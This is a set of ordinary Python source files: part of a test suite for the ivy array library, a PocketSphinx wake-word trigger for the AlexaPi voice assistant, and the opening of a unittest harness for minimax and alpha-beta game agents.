# smoke test
xs_as_arrays = [ivy.array(x, 'int32', dev) for x in xs]
rets = ivy.meshgrid(*xs_as_arrays, indexing=indexing)
# type test
for ret in rets:
assert ivy.is_array(ret)
# cardinality test
target_shape = tuple([len(x) for x in xs])
if indexing == 'xy':
target_shape = (target_shape[1], target_shape[0]) + target_shape[2:]
for ret in rets:
assert ret.shape == target_shape
# value test
assert np.allclose(
call(ivy.meshgrid, *xs_as_arrays, indexing=indexing),
[np.asarray(i) for i in ivy.functional.backends.numpy.meshgrid(*[ivy.to_numpy(x) for x in xs_as_arrays], indexing=indexing)])
# scatter_flat
@pytest.mark.parametrize(
"inds_n_upd_n_size_n_tnsr_n_wdup", [([0, 4, 1, 2], [1, 2, 3, 4], 8, None, False),
([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], 8, None, True),
([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], None, [11, 10, 9, 8, 7, 6], True)])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_flat(inds_n_upd_n_size_n_tnsr_n_wdup, red, dtype, tensor_fn, dev, call):
# smoke test
if red in ('sum', 'min', 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
inds, upd, size, tensor, with_duplicates = inds_n_upd_n_size_n_tnsr_n_wdup
if ivy.exists(tensor) and call is helpers.mx_call:
# mxnet does not support scattering into pre-existing tensors
pytest.skip()
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
if tensor:
# pytorch variables do not support in-place updates
tensor = ivy.array(tensor, dtype, dev) if ivy.current_framework_str() == 'torch'\
else tensor_fn(tensor, dtype, dev)
ret = ivy.scatter_flat(inds, upd, size, tensor, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
if size:
assert ret.shape == (size,)
else:
assert ret.shape == tensor.shape
# value test
if red == 'replace' and with_duplicates:
# replace with duplicates gives non-deterministic outputs
return
assert np.allclose(call(ivy.scatter_flat, inds, upd, size, tensor, red, dev),
np.asarray(ivy.functional.backends.numpy.scatter_flat(
ivy.to_numpy(inds), ivy.to_numpy(upd), size,
ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor, red)))
# scatter_nd
@pytest.mark.parametrize(
"inds_n_upd_n_shape_tnsr_n_wdup",
[([[4], [3], [1], [7]], [9, 10, 11, 12], [8], None, False), ([[0, 1, 2]], [1], [3, 3, 3], None, False),
([[0], [2]], [[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]],
[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]]], [4, 4, 4], None, False),
([[0, 1, 2]], [1], None, [[[1, 2, 3], [4, 5, 6], [7, 8, 9]],
[[4, 5, 6], [7, 8, 9], [1, 2, 3]],
[[7, 8, 9], [1, 2, 3], [4, 5, 6]]], False)])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_nd(inds_n_upd_n_shape_tnsr_n_wdup, red, dtype, tensor_fn, dev, call):
# smoke test
if red in ('sum', 'min', 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
inds, upd, shape, tensor, with_duplicates = inds_n_upd_n_shape_tnsr_n_wdup
if ivy.exists(tensor) and call is helpers.mx_call:
# mxnet does not support scattering into pre-existing tensors
pytest.skip()
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
if tensor:
# pytorch variables do not support in-place updates
tensor = ivy.array(tensor, dtype, dev) if ivy.current_framework_str() == 'torch'\
else tensor_fn(tensor, dtype, dev)
ret = ivy.scatter_nd(inds, upd, shape, tensor, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
if shape:
assert tuple(ret.shape) == tuple(shape)
else:
assert tuple(ret.shape) == tuple(tensor.shape)
# value test
if red == 'replace' and with_duplicates:
# replace with duplicates gives non-deterministic outputs
return
ret = call(ivy.scatter_nd, inds, upd, shape, tensor, red, dev)
true = np.asarray(ivy.functional.backends.numpy.scatter_nd(
ivy.to_numpy(inds), ivy.to_numpy(upd), shape,
ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor, red))
assert np.allclose(ret, true)
# gather
@pytest.mark.parametrize(
"prms_n_inds_n_axis", [([9, 8, 7, 6, 5, 4, 3, 2, 1, 0], [0, 4, 7], 0),
([[1, 2], [3, 4]], [[0, 0], [1, 0]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather(prms_n_inds_n_axis, dtype, tensor_fn, dev, call):
# smoke test
prms, inds, axis = prms_n_inds_n_axis
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather(prms, inds, axis, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape
# value test
assert np.allclose(call(ivy.gather, prms, inds, axis, dev),
np.asarray(ivy.functional.backends.numpy.gather(ivy.to_numpy(prms), ivy.to_numpy(inds), axis)))
# gather_nd
@pytest.mark.parametrize(
"prms_n_inds", [([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[0, 1], [1, 0]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1]], [[1, 0]]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1, 0]], [[1, 0, 1]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather_nd(prms_n_inds, dtype, tensor_fn, dev, call):
# smoke test
prms, inds = prms_n_inds
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather_nd(prms, inds, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape[:-1] + prms.shape[inds.shape[-1]:]
# value test
assert np.allclose(call(ivy.gather_nd, prms, inds, dev),
np.asarray(ivy.functional.backends.numpy.gather_nd(ivy.to_numpy(prms), ivy.to_numpy(inds))))
# linear_resample
@pytest.mark.parametrize(
"x_n_samples_n_axis_n_y_true", [([[10., 9., 8.]], 9, -1, [[10., 9.75, 9.5, 9.25, 9., 8.75, 8.5, 8.25, 8.]]),
([[[10., 9.], [8., 7.]]], 5, -2,
[[[10., 9.], [9.5, 8.5], [9., 8.], [8.5, 7.5], [8., 7.]]]),
([[[10., 9.], [8., 7.]]], 5, -1,
[[[10., 9.75, 9.5, 9.25, 9.], [8., 7.75, 7.5, 7.25, 7.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linear_resample(x_n_samples_n_axis_n_y_true, dtype, tensor_fn, dev, call):
# smoke test
x, samples, axis, y_true = x_n_samples_n_axis_n_y_true
x = tensor_fn(x, dtype, dev)
ret = ivy.linear_resample(x, samples, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = list(x.shape)
num_x_dims = len(x_shape)
axis = axis % num_x_dims
x_pre_shape = x_shape[0:axis]
num_vals = x.shape[axis]
x_post_shape = x_shape[axis+1:]
assert list(ret.shape) == x_pre_shape + [samples] + x_post_shape
# value test
y_true = np.array(y_true)
y = call(ivy.linear_resample, x, samples, axis)
assert np.allclose(y, y_true)
# exists
@pytest.mark.parametrize(
"x", [[1.], None, [[10., 9., 8.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_exists(x, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
ret = ivy.exists(x)
# type test
assert isinstance(ret, bool)
# value test
y_true = x is not None
assert ret == y_true
# default
@pytest.mark.parametrize(
"x_n_dv", [([1.], [2.]), (None, [2.]), ([[10., 9., 8.]], [2.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_default(x_n_dv, dtype, tensor_fn, dev, call):
x, dv = x_n_dv
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
dv = tensor_fn(dv, dtype, dev)
ret = ivy.default(x, dv)
# type test
assert ivy.is_array(ret)
# value test
y_true = ivy.to_numpy(x if x is not None else dv)
assert np.allclose(call(ivy.default, x, dv), y_true)
# dtype bits
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ivy.all_dtype_strs)
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_bits(x, dtype, tensor_fn, dev, call):
# smoke test
if ivy.invalid_dtype(dtype):
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.dtype_bits(ivy.dtype(x))
# type test
assert isinstance(ret, int)
assert ret in [1, 8, 16, 32, 64]
# dtype_to_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_to_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dtype_as_str = ivy.dtype(x, as_str=True)
dtype_to_str = ivy.dtype_to_str(ivy.dtype(x))
# type test
assert isinstance(dtype_as_str, str)
assert isinstance(dtype_to_str, str)
# value test
assert dtype_to_str == dtype_as_str
# dtype_from_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_from_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dt0 = ivy.dtype_from_str(ivy.dtype(x, as_str=True))
dt1 = ivy.dtype(x)
# value test
assert dt0 is dt1
def test_cache_fn(dev, call):
def func():
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn()
ret0_again = cached_fn()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)()
ret0_again = ivy.cache_fn(func)()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_cache_fn_with_args(dev, call):
def func(_):
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn(0)
ret0_again = cached_fn(0)
ret1 = cached_fn(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)(0)
ret0_again = ivy.cache_fn(func)(0)
ret1 = ivy.cache_fn(func)(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
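# For reference, a minimal sketch of how a cache_fn-style memoizer could
# behave (an illustrative stand-in, not ivy's actual implementation): every
# wrapper shares one module-level dict, matching the behaviour tested above
# where repeated ivy.cache_fn(func) calls hit the same cache. Positional
# arguments must be hashable.
_SKETCH_CACHE = {}
def _sketch_cache_fn(fn):
    def cached_fn(*args):
        key = (fn, args)
        if key not in _SKETCH_CACHE:
            _SKETCH_CACHE[key] = fn(*args)
        return _SKETCH_CACHE[key]
    return cached_fn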
# def test_framework_setting_with_threading(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# def thread_fn():
# ivy.set_framework('numpy')
# x_ = np.array([0., 1., 2.])
# for _ in range(2000):
# try:
# ivy.reduce_mean(x_)
# except TypeError:
# return False
# ivy.unset_framework()
# return True
#
# # get original framework string and array
# fws = ivy.current_framework_str()
# x = ivy.array([0., 1., 2.])
#
# # start numpy loop thread
# thread = threading.Thread(target=thread_fn)
# thread.start()
#
# # start local original framework loop
# ivy.set_framework(fws)
# for _ in range(2000):
# ivy.reduce_mean(x)
# ivy.unset_framework()
#
# assert not thread.join()
def test_framework_setting_with_multiprocessing(dev, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
def worker_fn(out_queue):
ivy.set_framework('numpy')
x_ = np.array([0., 1., 2.])
for _ in range(1000):
try:
ivy.mean(x_)
except TypeError:
out_queue.put(False)
return
ivy.unset_framework()
out_queue.put(True)
# get original framework string and array
fws = ivy.current_framework_str()
x = ivy.array([0., 1., 2.])
# start numpy loop process
output_queue = multiprocessing.Queue()
worker = multiprocessing.Process(target=worker_fn, args=(output_queue,))
worker.start()
# start local original framework loop
ivy.set_framework(fws)
for _ in range(1000):
ivy.mean(x)
ivy.unset_framework()
worker.join()
assert output_queue.get_nowait()
# def test_explicit_ivy_framework_handles(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# # store original framework string and unset
# fw_str = ivy.current_framework_str()
# ivy.unset_framework()
#
# # set with explicit handle caught
# ivy_exp = ivy.get_framework(fw_str)
# assert ivy_exp.current_framework_str() == fw_str
#
# # assert backend implemented function is accessible
# assert 'array' in ivy_exp.__dict__
# assert callable(ivy_exp.array)
#
# # assert joint implemented function is also accessible
# assert 'cache_fn' in ivy_exp.__dict__
# assert callable(ivy_exp.cache_fn)
#
# # set global ivy to numpy
# ivy.set_framework('numpy')
#
# # assert the explicit handle is still unchanged
# assert ivy.current_framework_str() == 'numpy'
# assert ivy_exp.current_framework_str() == fw_str
#
# # unset global ivy from numpy
# ivy.unset_framework()
# def test_class_ivy_handles(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# class ArrayGen:
#
# def __init__(self, ivyh):
# self._ivy = ivyh
#
# def get_array(self):
# return self._ivy.array([0., 1., 2.])
#
# # create instance
# ag = ArrayGen(ivy.get_framework())
#
# # create array from array generator
# x = ag.get_array()
#
# # verify this is not a numpy array
# assert not isinstance(x, np.ndarray)
#
# # change global framework to numpy
# ivy.set_framework('numpy')
#
# # create another array from array generator
# x = ag.get_array()
#
# # verify this is not still a numpy array
# assert not isinstance(x, np.ndarray)
# einops_rearrange
@pytest.mark.parametrize(
"x_n_pattern_n_newx", [([[0., 1., 2., 3.]], 'b n -> n b', [[0.], [1.], [2.], [3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_rearrange(x_n_pattern_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, new_x = x_n_pattern_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_rearrange(x, pattern)
true_ret = einops.rearrange(ivy.to_native(x), pattern)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# einops_reduce
@pytest.mark.parametrize(
"x_n_pattern_n_red_n_newx", [([[0., 1., 2., 3.]], 'b n -> b', 'mean', [1.5])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_reduce(x_n_pattern_n_red_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, reduction, new_x = x_n_pattern_n_red_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_reduce(x, pattern, reduction)
true_ret = einops.reduce(ivy.to_native(x), pattern, reduction)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# einops_repeat
@pytest.mark.parametrize(
"x_n_pattern_n_al_n_newx", [([[0., 1., 2., 3.]], 'b n -> b n c', {'c': 2},
[[[0., 0.], [1., 1.], [2., 2.], [3., 3.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_repeat(x_n_pattern_n_al_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, axes_lengths, new_x = x_n_pattern_n_al_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_repeat(x, pattern, **axes_lengths)
true_ret = einops.repeat(ivy.to_native(x), pattern, **axes_lengths)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# profiler
# def test_profiler(dev, call):
#
# # ToDo: find way to prevent this test from hanging when run alongside other tests in parallel
#
# # log dir
# this_dir = os.path.dirname(os.path.realpath(__file__))
# log_dir = os.path.join(this_dir, '../log')
#
# # with statement
# with ivy.Profiler(log_dir):
# a = ivy.ones([10])
# b = ivy.zeros([10])
# a + b
# if call is helpers.mx_call:
# time.sleep(1) # required by MXNet for some reason
#
# # start and stop methods
# profiler = ivy.Profiler(log_dir)
# profiler.start()
# a = ivy.ones([10])
# b = ivy.zeros([10])
# a + b
# profiler.stop()
# if call is helpers.mx_call:
# time.sleep(1) # required by MXNet for some reason
# container types
def test_container_types(dev, call):
cont_types = ivy.container_types()
assert isinstance(cont_types, list)
for cont_type in cont_types:
assert hasattr(cont_type, 'keys')
assert hasattr(cont_type, 'values')
assert hasattr(cont_type, 'items')
def test_inplace_arrays_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch']:
assert ivy.inplace_arrays_supported()
elif cur_fw in ['jax', 'tensorflow']:
assert not ivy.inplace_arrays_supported()
else:
raise Exception('Unrecognized framework')
def test_inplace_variables_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch', 'tensorflow']:
assert ivy.inplace_variables_supported()
elif cur_fw in ['jax']:
assert not ivy.inplace_variables_supported()
else:
raise Exception('Unrecognized framework')
# @pytest.mark.parametrize(
# "x_n_new", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_update(x_n_new, tensor_fn, dev, call):
# x_orig, new_val = x_n_new
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# new_val = tensor_fn(new_val, 'float32', dev)
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_update(x_orig, new_val)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(x), ivy.to_numpy(new_val))
# return
# pytest.skip()
# @pytest.mark.parametrize(
# "x_n_dec", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_decrement(x_n_dec, tensor_fn, dev, call):
# x_orig, dec = x_n_dec
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# dec = tensor_fn(dec, 'float32', dev)
# new_val = x_orig - dec
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_decrement(x_orig, dec)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
# return
# pytest.skip()
# @pytest.mark.parametrize(
# "x_n_inc", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_increment(x_n_inc, tensor_fn, dev, call):
# x_orig, inc = x_n_inc
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# inc = tensor_fn(inc, 'float32', dev)
# new_val = x_orig + inc
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_increment(x_orig, inc)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
# return
# pytest.skip()
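# For reference, the in-place semantics the commented-out tests above check,
# sketched with plain numpy (illustrative only): an in-place update must keep
# the same object identity while overwriting the stored values.
#
#   x = np.array([0., 1., 2.])
#   x_id = id(x)
#   x[...] = [2., 1., 0.]      # update in place
#   assert id(x) == x_id       # same object, new values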
|
pocketsphinxtrigger.py
|
import os
import threading
import logging
import alsaaudio
from pocketsphinx import get_model_path
from pocketsphinx.pocketsphinx import Decoder
import alexapi.triggers as triggers
from .basetrigger import BaseTrigger
logger = logging.getLogger(__name__)
class PocketsphinxTrigger(BaseTrigger):
type = triggers.TYPES.VOICE
def __init__(self, config, trigger_callback):
super(PocketsphinxTrigger, self).__init__(config, trigger_callback, 'pocketsphinx')
self._enabled_lock = threading.Event()
self._disabled_sync_lock = threading.Event()
self._decoder = None
def setup(self):
# PocketSphinx configuration
ps_config = Decoder.default_config()
# Set recognition model to US
ps_config.set_string('-hmm', os.path.join(get_model_path(), self._tconfig['language']))
ps_config.set_string('-dict', os.path.join(get_model_path(), self._tconfig['dictionary']))
# Specify recognition key phrase
#ps_config.set_string('-keyphrase', self._tconfig['phrase'])
#ps_config.set_float('-kws_threshold', float(self._tconfig['threshold']))
### Multiple Hotwords
#ps_config.set_string('-inmic', 'yes')
ps_config.set_string('-kws', '/opt/AlexaPi/src/keyphrase.list')
# Hide the VERY verbose logging information when not in debug
if logging.getLogger('alexapi').getEffectiveLevel() != logging.DEBUG:
ps_config.set_string('-logfn', '/dev/null')
# Process audio chunk by chunk. When a keyword is detected, perform the action and restart the search
self._decoder = Decoder(ps_config)
def run(self):
thread = threading.Thread(target=self.thread, args=())
thread.daemon = True
thread.start()
def thread(self):
while True:
self._enabled_lock.wait()
# Enable reading microphone raw data
inp = alsaaudio.PCM(alsaaudio.PCM_CAPTURE, alsaaudio.PCM_NORMAL, self._config['sound']['input_device'])
inp.setchannels(1)
inp.setrate(16000)
inp.setformat(alsaaudio.PCM_FORMAT_S16_LE)
inp.setperiodsize(1024)
self._decoder.start_utt()
triggered = False
#assistantTriggered = False
voice_command = ""
while not triggered:
if not self._enabled_lock.is_set():
break
# Read from microphone
_, buf = inp.read()
# Detect if keyword/trigger word was said
self._decoder.process_raw(buf, False, False)
triggered = self._decoder.hyp() is not None
# To avoid overflows close the microphone connection
inp.close()
self._decoder.end_utt()
self._disabled_sync_lock.set()
if triggered:
### Assistant Starts Here
try:
voice_command = self._decoder.hyp().hypstr
except AttributeError:
# hyp() can return None if the hypothesis has been cleared
voice_command = ""
self._trigger_callback(self, voice_command)
###
def enable(self):
self._enabled_lock.set()
self._disabled_sync_lock.clear()
def disable(self):
self._enabled_lock.clear()
self._disabled_sync_lock.wait()
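# For reference, the '-kws' option above expects a keyword-spotting list file.
# A minimal sketch of the pocketsphinx format (one keyphrase per line followed
# by its detection threshold; the phrases and thresholds here are
# illustrative, not this project's actual configuration):
#
#   alexa /1e-20/
#   stop recording /1e-30/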
|
agent_test.py
|
"""
This file contains test cases to verify the correct implementation of the
functions required for this project including minimax, alphabeta, and iterative
deepening. The heuristic function is tested for conformance to the expected
interface, but cannot be automatically assessed for correctness.
STUDENTS SHOULD NOT NEED TO MODIFY THIS CODE. IT WOULD BE BEST TO TREAT THIS
FILE AS A BLACK BOX FOR TESTING.
"""
import random
import unittest
import timeit
import sys
import isolation
import game_agent
from collections import Counter
from copy import deepcopy
from copy import copy
from functools import wraps
from queue import Queue
from threading import Thread
from multiprocessing import TimeoutError
from queue import Empty as QueueEmptyError
from importlib import reload
WRONG_MOVE = """
The {} function failed because it returned a non-optimal move at search depth {}.
Valid choices: {}
Your selection: {}
"""
WRONG_NUM_EXPLORED = """
Your {} search visited the wrong nodes at search depth {}. If the number
of visits is too large, make sure that iterative deepening is only
running when the `iterative` flag is set in the agent constructor.
Max explored size: {}
Number you explored: {}
"""
UNEXPECTED_VISIT = """
Your {} search did not visit the number of expected unique nodes at search
depth {}.
Max explored size: {}
Number you explored: {}
"""
ID_FAIL = """
Your agent explored the wrong number of nodes using Iterative Deepening and
minimax. Remember that ID + MM should check every node in each layer of the
game tree before moving on to the next layer.
"""
INVALID_MOVE = """
Your agent returned an invalid move. Make sure that your function returns
a selection when the search times out during iterative deepening.
Valid choices: {!s}
Your choice: {}
"""
TIMER_MARGIN = 15 # time (in ms) to leave on the timer to avoid timeout
def curr_time_millis():
"""Simple timer to return the current clock time in milliseconds."""
return 1000 * timeit.default_timer()
def handler(obj, testcase, queue):
"""Handler to pass information between threads; used in the timeout
function to abort long-running (i.e., probably hung) test cases.
"""
try:
queue.put((None, testcase(obj)))
except:
queue.put((sys.exc_info(), None))
def timeout(time_limit):
"""Function decorator for unittest test cases to specify test case timeout.
The timer mechanism works by spawning a new thread for the test to run in
and using the timeout handler for the thread-safe queue class to abort and
kill the child thread if it doesn't return within the timeout.
It is not safe to access system resources (e.g., files) within test cases
wrapped by this timer.
"""
def wrapUnitTest(testcase):
@wraps(testcase)
def testWrapper(self):
queue = Queue()
try:
p = Thread(target=handler, args=(self, testcase, queue))
p.daemon = True
p.start()
err, res = queue.get(timeout=time_limit)
p.join()
if err:
raise err[0](err[1]).with_traceback(err[2])
return res
except QueueEmptyError:
raise TimeoutError("Test aborted due to timeout. Test was " +
"expected to finish in less than {} second(s).".format(time_limit))
return testWrapper
return wrapUnitTest
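# Usage sketch for the decorator above (mirrors the test cases below): the
# wrapped test runs in a daemon thread and is aborted with TimeoutError if no
# result arrives within the limit.
#
#   @timeout(2)
#   def test_something(self):
#       ...  # fails with TimeoutError after 2 seconds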
def makeEvalTable(table):
"""Use a closure to create a heuristic function that returns values from
a table that maps board locations to constant values. This supports testing
the minimax and alphabeta search functions.
THIS HEURISTIC IS ONLY USEFUL FOR TESTING THE SEARCH FUNCTIONALITY -
IT IS NOT MEANT AS AN EXAMPLE OF A USEFUL HEURISTIC FOR GAME PLAYING.
"""
def score(game, player):
row, col = game.get_player_location(player)
return table[row][col]
return score
def makeEvalStop(limit, timer, value=None):
"""Use a closure to create a heuristic function that forces the search
timer to expire when a fixed number of node expansions have been perfomred
during the search. This ensures that the search algorithm should always be
in a predictable state regardless of node expansion order.
THIS HEURISTIC IS ONLY USEFUL FOR TESTING THE SEARCH FUNCTIONALITY -
IT IS NOT MEANT AS AN EXAMPLE OF A USEFUL HEURISTIC FOR GAME PLAYING.
"""
def score(game, player):
if timer.time_left() < 0:
raise TimeoutError("Timer expired during search. You must " +
"return an answer before the timer reaches 0.")
if limit == game.counts[0]:
timer.time_limit = 0
return 0
return score
def makeBranchEval(first_branch):
"""Use a closure to create a heuristic function that evaluates to a nonzero
score when the root of the search is the first branch explored, and
otherwise returns 0. This heuristic is used to force alpha-beta to prune
some parts of a game tree for testing.
THIS HEURISTIC IS ONLY USEFUL FOR TESTING THE SEARCH FUNCTIONALITY -
IT IS NOT MEANT AS AN EXAMPLE OF A USEFUL HEURISTIC FOR GAME PLAYING.
"""
def score(game, player):
if not first_branch:
first_branch.append(game.root)
if game.root in first_branch:
return 1.
return 0.
return score
class CounterBoard(isolation.Board):
"""Subclass of the isolation board that maintains counters for the number
of unique nodes and total nodes visited during depth first search.
Some functions from the base class must be overridden to maintain the
counters during search.
"""
def __init__(self, *args, **kwargs):
super(CounterBoard, self).__init__(*args, **kwargs)
self.counter = Counter()
self.visited = set()
self.root = None
def copy(self):
